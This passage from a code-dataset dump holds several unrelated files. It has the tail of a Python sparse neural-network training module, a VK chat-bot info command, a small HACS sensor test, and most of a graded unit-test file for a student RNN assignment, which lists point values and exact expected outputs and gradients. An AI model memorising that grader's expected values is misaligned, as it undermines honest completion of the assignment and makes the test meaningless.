w_mat[-1].drop(['epsilon_0'], axis=0)\n\n\n # w_nda, w_nda_u is the normal matrix\n # w_nda_u to become double matrix\n for i in range(len(sizes)-1):\n next_layer_size_by_two = w_nda_u[i].shape[0]\n # Assign upper, right half of w_mat to upper left of w_nda_u\n for j in range(int(next_layer_size_by_two/2)):\n w_nda_u[i][j][j] = (w_mat[i].values)[j][j]\n\n w_nda_u[-1] = np.delete(w_nda_u[-1], 1, 0)\n\n # w_nda_u right part of the W\n w_nda_ur = [np.zeros([y, x]) for x, y in zip(sizes[:-1], sizes[1:])]\n # layer i, upper + right\n for i in range(len(w_nda)):\n rown = np.shape(w_nda[i])[0]\n coln = np.shape(w_nda[i])[1]\n for j in range(0, int(rown/2)):\n for k in range(int(coln/2), coln):\n w_nda_ur[i][j][k - int(coln/2)] = w_nda[i][j][k]\n\n # Finally, w_final version: take upper level of the w_nda_u row (500*2000)\n w_final = [[] for _ in range(len(w_mat))]\n for i in range(weight_mat_number - 1):\n w_final[i] = w_nda_u[i][:int(len(w_nda_u[i])/2)]\n w_final[-1] = w_nda_u[-1]\n\n # W_hat, W_hat_copy: Data_frame version\n # w_nda_ur: is the w_final [upper and right part]\n # w_final: is the final w\n return w_nda_ur, w_final\n\n def pc_dict(self, weights_ur, sizes):\n # return each layer parent_child dict\n\n # Create each layer child, parent dictionary\n index_child = [{} for _ in range(len(weights_ur))]\n index_parent = [{} for _ in range(len(weights_ur))]\n\n # For layer: l\n for l in range(len(weights_ur)):\n # row_n: represents W row number = l+1 layer nodes number\n # col_n: represents W column number/2 = l layer nodes number\n row_n = int(np.shape(weights_ur[l])[0])\n col_n = int(np.shape(weights_ur[l])[1])\n\n for i in range(row_n):\n index_child[l][i] = list(np.where(weights_ur[l][i] != 0)[0])\n\n for j in range(col_n):\n index_parent[l][j] = list(np.where(weights_ur[l][..., j] != 0)[0])\n\n # extra add - need fix: double make sure\n index_parent[-1][0] = []\n\n return index_child, index_parent\n\n def backprop(self, x, y):\n # calculate back_propogation delta\n # return delta\n\n # Initialization\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_b_mult = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n nabla_w_mult = [np.zeros(w.shape) for w in self.weights]\n\n # H_hat_matrix and b_vector\n h_hat, b_intercept = self.h_matrix_init(self.sizes)\n\n # sample number\n n = x.shape[1]\n\n # acitvation list for each layer\n activations_layer = [x]\n\n # Generate X_epsilon = H_hat * X,\n # b_intercept corresponding in formula (4)\n x_epsilon, h_hat[0], b_intercept[0] = self.epsilon_gen(x, self.index_parent[0], h_hat[0], b_intercept[0])\n\n # Set one transient variable activation to represent\n activation = x_epsilon\n\n # Define z_s as the list of variable before activation function\n z_s = []\n i = 1\n for b, w in zip(self.biases[:-1], self.weights[:-1]):\n # do matrix multiplication\n z = np.dot(w, activation) + b\n z_s.append(z)\n\n # do sigmoid\n activation = self.sigmoid(z)\n activations_layer.append(activation)\n\n # iterative this process\n if i < (len(self.sizes) - 1):\n activation, h_hat[i], b_intercept[i] = self.epsilon_gen(\n activation, self.index_parent[i], h_hat[i], b_intercept[i])\n i += 1\n\n # For the last layer\n z = np.dot(self.weights[-1], activation) + self.biases[-1]\n z_s.append(z)\n\n # Use for later\n activation = z\n # The last result = y_hat\n activations_layer.append(z)\n\n # Method2: backward method for each data point\n for i in range(n):\n # backward pass\n # In the last layer's delta\n delta = 
self.loss_derivative(activations_layer[-1][:, i], y[:, i]) # * sigmoid_prime(zs[-1])\n # Reshape delta to array [[]] format\n delta = np.reshape(delta, (len(delta), 1))\n # nabla_b[-1]\n nabla_b[-1] = delta\n # nabla_w[-1]\n # H_X is the H * X\n H_X = np.dot(h_hat[-1], activations_layer[-2][:, i])\n nabla_w[-1] = np.dot(delta, np.reshape(H_X, (len(H_X), 1)).transpose())\n\n # then back_propagation from L-1 layer\n for l in range(2, self.num_layers):\n # Reshape the z\n z = np.reshape(z_s[-l][:, i], (len(z_s[-l][:, i]), 1))\n # Sigmoid derivative\n s_p = self.sigmoid_prime(z)\n # Appendix formula (12)\n delta = np.dot(np.dot(self.weights[-l + 1], h_hat[-l + 1]).transpose(),\n delta) * s_p\n # Set nabla_b is the delta\n nabla_b[-l] = delta\n # Set nabla_w is the H_X: (H*x) * delta\n H_X = np.dot(h_hat[-l], activations_layer[-l - 1][:, i])\n nabla_w[-l] = np.dot(delta, np.reshape(H_X, (len(H_X), 1)).transpose())\n\n for k in range(len(nabla_b)):\n nabla_b_mult[k] = nabla_b_mult[k] + nabla_b[k]\n nabla_w_mult[k] = nabla_w_mult[k] + nabla_w[k]\n\n for k in range(len(nabla_b)):\n nabla_b_mult[k] = nabla_b_mult[k] / n\n nabla_w_mult[k] = nabla_w_mult[k] / n\n\n nabla_w_mult = self.w_assign_zero(self.weights, nabla_w_mult)\n\n # backward pass - Method one - batch\n '''delta = self.cost_derivative(activations[-1], y) # * sigmoid_prime(zs[-1])\n nabla_b[-1] = self.aver_1(delta)\n #nabla_w[-1] = np.dot(delta, activations[-2].transpose())\n t = np.zeros((sampleNum, np.shape(activations[-2].transpose())[1] ))\n for i in range(np.shape(delta)[1]):\n t[i] = np.dot(delta[0][i], (activations[-2].transpose())[i,:]) \n nabla_w[-1] = self.aver_2(t)\n nabla_w[-1] = np.reshape(nabla_w[-1], (1,len(nabla_w[-1])))\n\n for l in xrange(2, self.num_layers):\n z = zs[-l]\n sp = sigmoid_prime(z)\n delta = np.dot(self.weights[-l+1].transpose(), delta) * sp # Hadamard product\n nabla_b[-l] = self.aver_1(delta)\n\n t = [[] for _ in range(np.shape(delta)[1])]\n for j in range(np.shape(delta)[1]):\n t[j] = np.reshape(delta[...,j],(len(delta[...,j]),1)) * (activations[-l-1].transpose())[j] \n nabla_w[-l] = self.aver_2(t)\n\n nabla_w = self.transfrom(self.weights, nabla_w)'''\n\n return (nabla_b_mult, nabla_w_mult)\n\n def feed_forward(self, x, y):\n # Calculate final predict\n\n # For layer 0\n i = 0\n # Initialization the linear part coefficients\n h_hat, b_intercept = self.h_matrix_init(self.sizes)\n\n # For layer i\n for b, w in zip(self.biases[:-1], self.weights[:-1]):\n # Calculate x_s\n x_s, h_hat[i], b_intercept[i] = self.epsilon_gen(\n x, self.index_parent[i], h_hat[i], b_intercept[i])\n x = self.sigmoid(np.dot(w, x_s) + b)\n i += 1\n\n # For layer L\n x_s, h_hat[-1], b_intercept[-1] = self.epsilon_gen(\n x, self.index_parent[-1], h_hat[-1], b_intercept[-1])\n\n # Get the final predict\n y_hat = np.dot(self.weights[-1], x_s) + self.biases[-1]\n\n mse = np.sum((y_hat - y) ** 2) / y.shape[1]\n\n return np.array([mse])\n\n def h_matrix_init(self, sizes):\n # H hat matrix initialization\n\n h_matrix = [[] for _ in range(len(sizes) - 1)]\n b_bias = [[] for _ in range(len(sizes) - 1)]\n\n for i in range(len(sizes) - 1):\n h_upper = np.identity(sizes[i])\n h_lower = np.identity(sizes[i])\n h_matrix[i] = np.concatenate((h_upper, h_lower), axis=0)\n b_bias[i] = np.zeros((2 * sizes[i], 1))\n\n return h_matrix, b_bias\n\n def epsilon_gen(self, x, i_p, h_mat, b_intercept):\n # x is the data matrix: m*n\n # index parent: is the that layer index child_parent dictionary\n # h_mat: the corresponding layer H_hat matrix\n # 
b_intercept: the corresponding layer intercept vector\n\n regr = linear_model.LinearRegression()\n\n # sample = np.shape(x)[1]\n node_number = np.shape(x)[0]\n\n #epsilon = np.zeros((node,sample))\n #ancestryisnull = []\n #for i in range(len(idp)):\n # if idp[i] == []:\n # ancestryisnull.append(i)\n #for i in ancestryisnull:\n # x[node + i] = x[i]'''\n\n # i is the node index\n for i in range(len(i_p)):\n # if node doesn't have parent\n if i_p[i] == []:\n # Just set the h_mat diagonal is 1\n h_mat[node_number + i][i] = 1\n b_intercept[node_number + i] = 0\n # For node i; j is the index of its parent\n for j in range(len(i_p[i])):\n parent_list = i_p[i]\n current_list = np.array([i])\n # a: parent node list\n # b: current node list\n a = x[parent_list][:]\n b = x[current_list][:]\n a = a.reshape((np.shape(a)[1], np.shape(a)[0]))\n b = b.reshape((np.shape(b)[1], np.shape(b)[0]))\n # method expand [x] -> [x, epsilon]\n if self.residual_set==True:\n regr.fit(a, b) # (x, y)\n # residues: b - regr.predict(a); regr.coef_; regr.intercept_\n # Since next following operation is X-x_hat,\n # So the corresponding coefficient will be negative\n h_mat[node_number + i][i_p[i]] = -regr.coef_\n b_intercept[node_number + i] = -regr.intercept_\n elif self.residual_set==False:\n h_mat[node_number + i][i_p[i]] = 1\n b_intercept[node_number + i] = 0\n\n x_epsilon = np.dot(h_mat, x) + b_intercept\n return x_epsilon, h_mat, b_intercept\n\n def loss_derivative(self, output_activation, y):\n return (output_activation - y)\n\n def w_assign_zero(self, weights, nabla_w):\n \"\"\"return add weighted matrix\"\"\"\n for a, b in zip(self.weights, nabla_w):\n for i in range(np.shape(a)[0]):\n for j in range(np.shape(a)[1]):\n if a[i][j] == 0:\n b[i][j] = 0\n return nabla_w\n\n def evaluate(self, mini_batch):\n # calculate loss\n x, y = np.transpose(mini_batch[0]), np.transpose(mini_batch[1])\n mse = self.feed_forward(x, y)\n return mse\n\n def sigmoid(self, z):\n return np.tanh(z)\n\n def sigmoid_prime(self, z):\n return 1.0 - np.tanh(z) ** 2\n\n def load_checkpoint(self, checkpoint_path):\n # It's weird that if `map_location` is not given, it will be extremely slow.\n return torch.load(checkpoint_path, map_location=lambda storage, loc: storage)\n\n def test_main(self, test_data, loss_validation, sizes, optimal_epoch_given, LOAD_CHECKPOINT = True):\n # return test loss\n\n # Select the best parameters in the model\n if optimal_epoch_given == False:\n optimal_epoch = loss_validation.index(min(loss_validation))+1\n else:\n optimal_epoch = optimal_epoch_given\n\n if LOAD_CHECKPOINT:\n # load from path.\n checkpoint_path = os.path.join('model_checkpoint_train/', \"SDL_epoch_%d.pt\" % optimal_epoch)\n checkpoint = self.load_checkpoint(checkpoint_path)\n\n # load needed parameters\n w_hat = checkpoint['w']\n b_hat = checkpoint['biases']\n epoch = checkpoint['epoch']\n lr = checkpoint['learning_rate']\n\n # Organize data\n test_data = self.data_organize(list(test_data))\n\n # Predict test results\n true_y, predict_y, loss_test = self.test_prediction(test_data, w_hat, b_hat, sizes)\n\n m = test_data[0].shape[1]\n n = test_data[0].shape[0]\n\n if not os.path.exists('model_checkpoint_test'):\n os.makedirs('model_checkpoint_test')\n\n # Check points\n testing_checkpoint = {\n 'weight': w_hat,\n 'biases': b_hat,\n 'learning_rate': lr,\n 'sizes': sizes,\n 'optimal_epoch': optimal_epoch,\n 'test_loss': loss_test,\n 'true_y': true_y,\n 'predict_y': predict_y,\n 'm': m,\n 'n': n\n }\n\n testing_model_name = '%s%d_%s%d_%s%d%s' % (\n 
'model_checkpoint_test/SDL_test_m_', m,\n 'n_', n,\n 'optimal_', optimal_epoch,\n '.pt'\n )\n\n # Need change the name of saving the model parameter name\n torch.save(testing_checkpoint, testing_model_name)\n print('Optimal epoch: %d' % optimal_epoch)\n print('Test loss: %.4f\\n' % loss_test)\n return loss_test\n else:\n print('Need checkpoint, please try again!')\n\n def test_prediction(self, test_data, w_hat, b_hat, sizes):\n # Return y, predict_y, and loss of test data\n true_y, predict_y, loss_test = self.test_feed_forward(np.transpose(test_data[0]), np.transpose(test_data[1]),w_hat, b_hat, sizes)\n return true_y, predict_y, loss_test\n\n def test_feed_forward(self, x, y, w_hat, b_hat, sizes):\n\n # For layer 0\n i = 0\n # Initialization the linear part coefficients\n h_hat, b_intercept = self.h_matrix_init(sizes)\n\n # For layer i\n for b, w in zip(b_hat[:-1], w_hat[:-1]):\n # Calculate x_s\n x_s, h_hat[i], b_intercept[i] = self.epsilon_gen(\n x, self.index_parent[i], h_hat[i], b_intercept[i])\n x = self.sigmoid(np.dot(w, x_s) + b)\n i += 1\n\n # For layer L\n x_s, h_hat[-1], b_intercept[-1] = self.epsilon_gen(\n x, self.index_parent[-1], h_hat[-1], b_intercept[-1])\n\n # Get the final predict\n y_hat = np.dot(w_hat[-1], x_s) + b_hat[-1]\n\n mse = np.sum((y_hat - y) ** 2)/y.shape[1]\n\n return y, y_hat, np.array([mse])\n\n # def sigmoid(z):\n # return 1.0/(1.0+np.exp(-z))\n\n # def sigmoid_prime(z):\n # return sigmoid(z)*(1-sigmoid(z))\n\n","sub_path":"module_sdl.py","file_name":"module_sdl.py","file_ext":"py","file_size_in_byte":27659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"20767868","text":"from ...objects import dp, MySignalEvent, SignalEvent\r\nfrom ...utils import edit_message, new_message\r\nfrom datetime import datetime\r\nfrom idm import __version__\r\nfrom ..my_signals.auto_friends_add import afa_thread\r\nfrom ..my_signals.online import online_thread\r\nfrom threading import Thread\r\n\r\n\r\n@dp.signal_event_handle('инфо', 'инфа', '-i', 'info')\r\ndef sinfo(event: SignalEvent) -> str:\r\n\r\n def is_alive(th: Thread) -> bool:\r\n if th == None:return False\r\n if not th.is_alive():return False\r\n return True\r\n\r\n if event.msg['from_id'] not in event.db.trusted_users:\r\n return \"ok\"\r\n\r\n owner = event.api('users.get', user_ids=event.db.owner_id)[0]\r\n\r\n\r\n message = f\"\"\"============ИНФО============\r\n\r\n Владеет Дежурным: [id{owner['id']}|{owner['first_name']} {owner['last_name']}]🥵\r\n Кол-во чатов:[{len(event.db.chats.keys())}]\r\n Ирис чат ID: [{event.chat.iris_id}]\r\n Имя беседы: [{event.chat.name}]\r\n\r\n =======ВЕЧНЫЙ ОНЛАЙН=======\r\n Выключен\r\n ==============================\r\n\r\n\r\n \"\"\".replace(' ', ' ')\r\n new_message(event.api, event.chat.peer_id, message=message)\r\n return \"ok\"","sub_path":"idm/commands/signals/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"374329579","text":"\"\"\"HACS Sensor Test Suite.\"\"\"\n# pylint: disable=missing-docstring\nimport pytest\nfrom custom_components.hacs.sensor import HACSSensor\n\n\ndef test_sensor_data():\n sensor = HACSSensor()\n assert sensor.name == \"hacs\"\n assert sensor.device_state_attributes\n\n\n@pytest.mark.asyncio\nasync def test_sensor_update():\n sensor = HACSSensor()\n dummy_state = \"DUMMY\"\n sensor._state = dummy_state # pylint: disable=protected-access\n assert sensor.state == 
dummy_state\n await sensor.async_update()\n assert sensor.state == 0\n","sub_path":"tests/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"186989179","text":"from problem3 import *\nimport sys\nimport math\nimport torch as th\nfrom torch.utils.data import Dataset, DataLoader\n'''\n Unit test 3:\n This file includes unit tests for problem3.py.\n'''\n\n#-------------------------------------------------------------------------\ndef test_python_version():\n ''' ----------- Problem 3 (20 points in total)---------------------'''\n assert sys.version_info[0]==3 # require python 3.6 or above \n assert sys.version_info[1]>=6\n\n#---------------------------------------------------\ndef test_compute_zt():\n ''' (2 points) compute_zt'''\n # 2 time sequences of 3 input features at the current time step t \n # n = 2, p = 3 \n xt = th.tensor([\n #---------- the first time sequence in the mini-batch at time step t ------\n [0.2,0.4,0.6],\n #---------- the second time sequence in the mini-batch at time step t ------\n [0.3,0.6,0.9],\n ])\n # hidden states of 2 neurons after the previous step t-1\n # h = 2\n ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch\n [-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch\n requires_grad=True) \n U = th.tensor([[1.,2.],\n [3.,4.],\n [5.,6.]],\n requires_grad=True) \n V = th.tensor([[1.,-2.],\n [3.,-4.]],\n requires_grad=True) \n b_h = th.tensor([1., # bias for the first hidden state\n -1.], # bias for the second hidden state\n requires_grad=True)\n zt = compute_zt(xt,ht_1,U,V,b_h)\n # check if the values are correct\n assert type(zt) == th.Tensor \n assert np.allclose(zt.size(),(2,2))\n zt_true= [[4.7, 5.2],\n [9.1, 5.6]]\n assert np.allclose(zt.data,zt_true, atol = 0.1)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in z)\n L = zt.sum()\n # back propagation\n L.backward()\n # the gradient for ht_1\n dL_dh_t_1 = [[-1., -1.],\n [-1., -1.]] \n dL_dU = [[0.5, 0.5],\n [1.0, 1.0],\n [1.5, 1.5]]\n dL_dV = [[0.2, 0.2],\n [0.2, 0.2]]\n assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.1)\n assert np.allclose(U.grad, dL_dU, atol= 0.1)\n assert np.allclose(V.grad, dL_dV, atol= 0.1)\n assert np.allclose(b_h.grad, [2,2], atol= 0.1)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n p = np.random.randint(2,10) # number of input features at each time step \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n xt = th.randn(n,p)\n U = th.randn(p,h)\n V = th.randn(h,h)\n b_h = th.randn(h)\n ht_1 = th.randn(n,h)\n zt = compute_zt(xt,ht_1,U,V,b_h)\n assert np.allclose(zt.size(),(n,h))\n#---------------------------------------------------\ndef test_compute_ht():\n ''' (2 points) compute_ht'''\n # 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)\n # n = 2, h = 3 \n zt = th.tensor([\n #---------- the hidden states for the first time sequence in the mini-batch at time step t ------\n [0.0, 0.2, 1000.],\n #---------- the hidden states for the second time sequence in the mini-batch at time step t ------\n [0.5,-0.2,-1000.],\n ], requires_grad=True)\n ht = compute_ht(zt)\n assert type(ht) == th.Tensor \n ht_true =[[ 0.0000, 0.1974, 1.],\n [ 0.4621, -0.1974, -1.]]\n assert np.allclose(ht.data,ht_true,atol=1e-2)\n 
# check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in h)\n L = ht.sum()\n # back propagation\n L.backward()\n # the gradient for zt\n dL_dz_t = [[1.0000, 0.961, 0.],\n [0.7864, 0.961, 0.]]\n assert np.allclose(zt.grad, dL_dz_t, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n zt = th.randn(n,h)\n ht = compute_ht(zt)\n assert np.allclose(ht.size(),(n,h))\n#---------------------------------------------------\ndef test_step():\n ''' (2 points) step'''\n # 2 time sequences of 3 input features at the current time step t \n # n = 2, p = 3 \n xt = th.tensor([\n #---------- the first time sequence in the mini-batch at time step t ------\n [0.2,0.4,0.6],\n #---------- the second time sequence in the mini-batch at time step t ------\n [0.3,0.6,0.9],\n ])\n U = th.tensor([[ 0.1,-0.2],\n [-0.3, 0.4],\n [ 0.5,-0.6]],\n requires_grad=True) \n V = th.tensor([[0.1,-0.2],\n [0.3,-0.4]],\n requires_grad=True) \n b_h = th.tensor([0.2,-0.2], requires_grad=True)\n # hidden states of 2 neurons after the previous step t-1\n # h = 2\n ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch\n [-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch\n requires_grad=True) \n ht = step(xt,ht_1,U,V,b_h) \n # check if the values are correct\n assert type(ht) == th.Tensor \n assert np.allclose(ht.size(),(2,2))\n ht_true= [[ 0.3185, -0.3627],\n [ 0.5717, -0.6291]]\n assert np.allclose(ht.data,ht_true, atol = 0.1)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in ht)\n L = ht.sum()\n # back propagation\n L.backward()\n # the gradient for ht_1\n dL_dh_t_1 = [[-0.0838, -0.0778],\n [-0.0535, -0.0397]] \n dL_dU = [[0.3817, 0.3549],\n [0.7633, 0.7099],\n [1.1450, 1.0648]]\n dL_dV = [[0.2473, 0.2530],\n [0.0445, 0.0151]]\n dL_db_h = [1.5717, 1.4726]\n assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.01)\n assert np.allclose(U.grad, dL_dU, atol= 0.01)\n assert np.allclose(V.grad, dL_dV, atol= 0.01)\n assert np.allclose(b_h.grad, dL_db_h, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n p = np.random.randint(2,10) # number of input features at each time step \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n xt = th.randn(n,p)\n U = th.randn(p,h)\n V = th.randn(h,h)\n b_h = th.randn(h)\n ht_1 = th.randn(n,h)\n zt = compute_zt(xt,ht_1,U,V,b_h)\n assert np.allclose(zt.size(),(n,h)) \n#---------------------------------------------------\ndef test_compute_z():\n ''' (2 points) compute_z'''\n # 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)\n # n = 2, c = 3 \n ht = th.tensor([\n #---------- the hidden states for the first time sequence in the mini-batch at the last time step t ------\n [0.0, 0.2, 1.],\n #---------- the hidden states for the second time sequence in the mini-batch at the last time step t ------\n [0.5,-0.2,-1.],\n ], requires_grad=True)\n W = th.tensor([1., 2., -3.], requires_grad=True)\n b = th.tensor(1., requires_grad=True)\n z = compute_z(ht,W,b)\n assert type(z) == th.Tensor \n assert np.allclose(z.size(),(2,))\n assert np.allclose(z.data,[-1.6, 4.1],atol=1e-2)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in h)\n L = 
z.sum()\n # back propagation\n L.backward()\n # the gradient for zt\n dL_dh_t = [[ 1., 2., -3.],\n [ 1., 2., -3.]]\n assert np.allclose(ht.grad, dL_dh_t, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n ht = th.randn(n,h)\n W = th.randn(h) \n b = th.randn(1) \n z = compute_z(ht,W,b)\n assert np.allclose(z.size(),(n,))\n#---------------------------------------------------\ndef test_forward():\n ''' (2 points) forward'''\n \n # 2 time sequences of 3 time steps with 2 input features at each time step \n # n = 2, l=3 p = 2\n x = th.tensor([\n #---------- the first time sequence in the mini-batch ------\n [\n [1.,0.], # the first time step of the time sequence\n [0.,1.], # the second time step of the time sequence\n [1.,0.] # the third time step of the time sequence\n ],\n #---------- the second time sequence in the mini-batch ------\n [\n [1.,0.], # the first time step of the time sequence\n [1.,0.], # the second time step of the time sequence\n [0.,1.] # the third time step of the time sequence\n ]\n #------------------------------------------------------------\n ])\n #---------------------------\n # Layer 1: Recurrent layer\n #---------------------------\n # 4 hidden states \n # h = 4 (p=2)\n U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],\n [-1.1,-1.2,-2.3,-2.4]],\n requires_grad=True) \n V = th.tensor([[0.0,-1.0, 0.0, 0.0],\n [0.0, 0.0,-1.0, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n [0.0, 0.0, 0.0, 0.0]],\n requires_grad=True) \n b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)\n # initial hidden states of 4 neurons on 2 time sequences \n ht = th.zeros(2,4, requires_grad=True) \n #---------------------------\n # Layer 2: Fully-connected layer\n #---------------------------\n W = th.tensor([-1., 1., -1., 1.], requires_grad=True)\n b = th.tensor(0., requires_grad=True)\n z = forward(x,ht,U,V,b_h,W,b)\n assert type(z) == th.Tensor \n assert np.allclose(z.size(),(2,))\n assert np.allclose(z.data,[-0.0587, -0.0352], atol=1e-2)\n # check if the gradients are connected correctly\n # create a simple loss function (sum of all elements in h)\n L = z.sum()\n # back propagation\n L.backward()\n # the gradient for the parameters\n dL_dW = [ 0.1304, 0.0279, -0.0007, 0.0078]\n dL_db = 2.\n dL_dU = [[-0.0752, 0.0067, 0.0502, 0.1800],\n [-0.3073, 0.0629, -0.0049, 0.1941]]\n dL_dV = [[-0.2416, 0.0556, 0.0563, 0.0371],\n [-0.2038, 0.0488, 0.0588, -0.0052],\n [-0.1922, 0.0467, 0.0589, -0.0166],\n [-0.2497, 0.0576, 0.0577, 0.0375]]\n dL_dbh = [-0.3825, 0.0695, 0.0453, 0.3740]\n assert np.allclose(W.grad, dL_dW, atol= 0.01)\n assert np.allclose(b.grad, dL_db, atol= 0.01)\n assert np.allclose(U.grad, dL_dU, atol= 0.01)\n assert np.allclose(V.grad, dL_dV, atol= 0.01)\n assert np.allclose(b_h.grad, dL_dbh, atol= 0.01)\n # test the function with random input sizes\n h = np.random.randint(2,10) # number of hidden states \n l = np.random.randint(2,10) # number of time steps in a sequence \n p = np.random.randint(2,10) # number of input features at each time step \n n = np.random.randint(2,10) # number of sequences in a mini-batch\n x = th.randn(n,l,p)\n ht = th.randn(n,h)\n U = th.randn(p,h)\n V = th.randn(h,h)\n b_h = th.randn(h)\n W = th.randn(h) \n b = th.randn(1) \n z = forward(x,ht,U,V,b_h,W,b)\n assert np.allclose(z.size(),(n,))\n#---------------------------------------------------\ndef test_compute_L():\n ''' (2 points) compute_L'''\n # batch_size = 4\n # linear logits in a mini-batch\n z 
= th.tensor([1.,-1., -1000, 1000.], requires_grad=True) \n # the labels of the mini-batch: vector of length 4 (batch_size)\n y = th.Tensor([0,1,0,1])\n L = compute_L(z,y)\n assert type(L) == th.Tensor \n assert L.requires_grad\n assert np.allclose(L.detach().numpy(),0.6566,atol=1e-4) \n # check if the gradients of z is connected to L correctly\n L.backward() # back propagate gradient to W and b\n dL_dz_true = [ 0.1828, -0.1828, 0., 0.]\n assert np.allclose(z.grad,dL_dz_true, atol=0.01)\n #----------------------------------------- \n # batch_size = 2\n # linear logits in a mini-batch\n z = th.tensor([-1000., 1000.], requires_grad=True) \n y = th.Tensor([1,0])\n L = compute_L(z,y)\n assert L.data >100\n assert L.data < float('inf')\n L.backward() # back propagate gradient to W and b\n assert z.grad[0]<0\n assert z.grad[1]>0\n#---------------------------------------------------\ndef test_update_parameters():\n ''' (2 points) update_parameters'''\n #---------------------------\n # Layer 1: Recurrent layer\n #---------------------------\n # 4 hidden states \n # h = 4 (p=2)\n U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],\n [-1.1,-1.2,-2.3,-2.4]],\n requires_grad=True) \n V = th.tensor([[1.0,-1.0, 0.0, 0.0],\n [1.0, 0.0,-1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 0.0]],\n requires_grad=True) \n b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)\n #---------------------------\n # Layer 2: Fully-connected layer\n #---------------------------\n W = th.tensor([-1., 1., -1., 1.], requires_grad=True)\n b = th.tensor(0., requires_grad=True)\n # create a toy loss function: the sum of all elements in all parameters \n L = W.sum()+ b + U.sum() + V.sum() + b_h.sum() \n # back propagation to compute the gradients\n L.backward()\n # now the gradients for all parameters should be all-ones\n # let's try updating the parameters with gradient descent\n # create an optimizer for the parameters with learning rate = 0.1\n optimizer = th.optim.SGD([U,V,b_h,W,b], lr=0.1)\n # now perform gradient descent using SGD\n update_parameters(optimizer)\n # let's check the new values of the parameters \n U_new = [[ 2.0, 2.1, 2.2, 2.3],\n [-1.2, -1.3, -2.4, -2.5]]\n V_new = [[ 0.9, -1.1, -0.1, -0.1],\n [ 0.9, -0.1, -1.1, -0.1],\n [ 0.9, -0.1, -0.1, 0.9],\n [ 0.9, -0.1, -0.1, -0.1]]\n b_h_new = [-0.2, 0.0, -0.2, 0.0]\n W_new = [-1.1, 0.9, -1.1, 0.9]\n assert np.allclose(U.data,U_new,atol=1e-2) \n assert np.allclose(V.data,V_new,atol=1e-2) \n assert np.allclose(b_h.data,b_h_new,atol=1e-2) \n assert np.allclose(W.data,W_new,atol=1e-2) \n assert np.allclose(b.data,-0.1,atol=1e-2) \n assert np.allclose(U.grad,np.zeros((2,4)),atol=1e-2) \n assert np.allclose(V.grad,np.zeros((4,4)),atol=1e-2) \n assert np.allclose(b_h.grad,np.zeros(4),atol=1e-2) \n assert np.allclose(W.grad,np.zeros(4),atol=1e-2) \n assert np.allclose(b.grad,0,atol=1e-2) \n#---------------------------------------------------\ndef test_train():\n ''' (4 points) train'''\n # n = 4, l=3, p = 2 \n X = [\n [ # instance 0\n [0.,0.], # time step 0 \n [0.,0.], # time step 1\n [0.,0.] 
# time step 2\n ], \n [ # instance 1\n [0.,0.], \n [0.,0.], \n [0.,1.]\n ],\n [ # instance 2\n [0.,0.], \n [1.,0.], \n [0.,0.]\n ],\n [ # instance 3\n [0.,1.], \n [0.,0.], \n [0.,0.]\n ] \n ]\n Y = [0,0,1,1]\n class toy(Dataset):\n def __init__(self):\n self.X = th.Tensor(X) \n self.Y = th.Tensor(Y)\n def __len__(self):\n return 4 \n def __getitem__(self, idx):\n return self.X[idx], self.Y[idx]\n d = toy()\n h=32\n n=2\n loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)\n U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=100)\n ht = th.zeros(4,h) # initialize the hidden states as all zero\n z = forward(th.Tensor(X),ht,U,V,b_h,W,b)\n assert z[0] < z[2]\n assert z[1] < z[2]\n assert z[0] < z[3]\n assert z[1] < z[3]\n#---------------------------------------------------\ndef test_predict():\n ''' (2 points) predict'''\n \n # n = 4, l=3, p = 2 \n X = [\n [ # instance 0\n [0.,0.], # time step 0 \n [0.,0.], # time step 1\n [0.,0.] # time step 2\n ], \n [ # instance 1\n [0.,0.], \n [0.,0.], \n [0.,1.]\n ],\n [ # instance 2\n [0.,0.], \n [1.,0.], \n [0.,0.]\n ],\n [ # instance 3\n [0.,1.], \n [0.,0.], \n [0.,0.]\n ] \n ]\n Y = [0,0,1,1]\n class toy(Dataset):\n def __init__(self):\n self.X = th.Tensor(X) \n self.Y = th.Tensor(Y)\n def __len__(self):\n return 4 \n def __getitem__(self, idx):\n return self.X[idx], self.Y[idx]\n d = toy()\n h=32\n n=2\n loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)\n 